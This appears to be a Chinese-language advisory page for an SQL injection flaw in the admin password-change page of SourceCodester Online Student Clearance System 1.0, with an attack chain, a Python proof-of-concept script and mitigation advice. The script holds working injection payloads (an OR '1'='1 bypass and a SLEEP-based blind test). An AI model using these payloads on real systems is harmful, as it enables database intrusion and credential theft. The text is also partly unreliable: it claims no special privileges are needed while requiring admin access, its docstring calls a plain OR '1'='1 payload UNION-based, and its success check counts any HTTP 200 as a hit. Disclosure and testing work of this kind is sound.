CVE-2025-13586 SourceCodester Online Student Clearance System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13586

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Online Student Clearance System 1.0

漏洞概述

CVE-2025-13586是SourceCodester公司开发的在线学生离校系统1.0版本中的一个中等严重性安全漏洞。该漏洞存在于Admin/changepassword.php文件中，由于对用户输入的txtconfirm_password参数缺乏充分的输入验证和过滤，攻击者可以通过构造恶意SQL语句实现SQL注入攻击。成功利用此漏洞可能导致敏感数据库信息泄露、未经授权的数据修改，甚至可能在某些配置下实现远程代码执行。该漏洞的CVSS评分为4.7，属于中等严重级别，攻击复杂度低，无需特殊权限即可实施攻击，但需要管理员身份认证。由于该漏洞的利用代码已被公开披露，建议相关用户尽快采取修复措施以防止潜在的安全风险。

技术细节

该SQL注入漏洞源于changepassword.php文件中对txtconfirm_password参数的处理不当。攻击者可以通过HTTP POST请求向/Admin/changepassword.php端点发送精心构造的SQL payloads。在正常情况下，该功能用于允许管理员修改用户密码，但未对输入参数进行预编译语句处理或适当的输入过滤。攻击者可以利用UNION SELECT、布尔盲注或时间盲注等技术提取数据库中的敏感信息，包括用户凭证、配置文件信息等。CVSS向量显示攻击向量为网络层面(AV:N)，认证要求为高权限(PR:H)，意味着攻击者需要具备管理员账户才能访问该功能页面。然而，一旦获得管理员访问权限，攻击者可以进一步利用此漏洞进行横向移动或提权操作。建议使用参数化查询或ORM框架来彻底消除此类SQL注入风险。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统为SourceCodester Online Student Clearance System 1.0，确认/Admin/changepassword.php端点存在

STEP 2

步骤2: 认证获取

攻击者获取管理员账户凭据或通过其他漏洞获取管理员访问权限

STEP 3

步骤3: 构造恶意请求

攻击者构造包含SQL注入payload的HTTP POST请求，针对txtconfirm_password参数注入恶意SQL代码

STEP 4

步骤4: 执行注入攻击

发送恶意请求到目标服务器，payload被直接拼接到SQL查询语句中执行

STEP 5

步骤5: 数据提取或权限提升

根据注入类型（UNION/布尔盲注/时间盲注），攻击者提取数据库敏感信息或进一步利用获取更高权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13586 SQL Injection PoC
# Target: SourceCodester Online Student Clearance System 1.0
# Endpoint: /Admin/changepassword.php
# Parameter: txtconfirm_password

TARGET_URL = "http://target.com/Admin/changepassword.php"

def exploit_sql_injection():
    """
    SQL Injection payload to extract database version
    Using UNION-based injection technique
    """
    # Basic authentication bypass payload
    payload = {
        'txtconfirm_password': "admin' OR '1'='1",
        'txtpassword': 'admin',
        'username': 'admin'
    }
    
    try:
        response = requests.post(TARGET_URL, data=payload, timeout=10)
        print(f"[*] Request sent to {TARGET_URL}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)}")
        
        # Check for successful injection indicators
        if 'success' in response.text.lower() or response.status_code == 200:
            print("[+] Potential SQL Injection detected!")
            return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
    
    return False

def blind_sql_injection():
    """
    Time-based blind SQL injection for data extraction
    """
    # Time-based blind injection payload
    payload = {
        'txtconfirm_password': "admin' AND SLEEP(5)-- -",
        'txtpassword': 'admin',
        'username': 'admin'
    }
    
    try:
        import time
        start = time.time()
        response = requests.post(TARGET_URL, data=payload, timeout=15)
        elapsed = time.time() - start
        
        if elapsed >= 5:
            print("[+] Blind SQL Injection confirmed - server delayed response")
            return True
    except requests.exceptions.RequestException:
        pass
    
    return False

if __name__ == "__main__":
    print("CVE-2025-13586 SQL Injection PoC")
    print("=" * 50)
    exploit_sql_injection()
    blind_sql_injection()

影响范围

SourceCodester Online Student Clearance System 1.0

防御指南

临时缓解措施

在官方修复方案发布之前，可采取以下临时缓解措施：1) 在Web服务器层面配置SQL注入防护规则；2) 临时禁用changepassword.php功能或限制其访问；3) 加强对管理员账户的监控和审计；4) 实施IP白名单策略限制管理后台访问；5) 启用数据库操作日志记录以便及时发现异常行为。建议持续关注官方安全公告，尽快部署正式修复补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13586
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13586
3 Details https://www.cvedetails.com/cve/CVE-2025-13586/
4 VulDB https://vuldb.com/cve/CVE-2025-13586
5 Link https://github.com/CaseyW33/CVE/issues/2
6 Link https://vuldb.com/?ctiid.333350
7 Link https://vuldb.com/?id.333350
8 Link https://vuldb.com/?submit.700130
9 Link https://www.sourcecodester.com/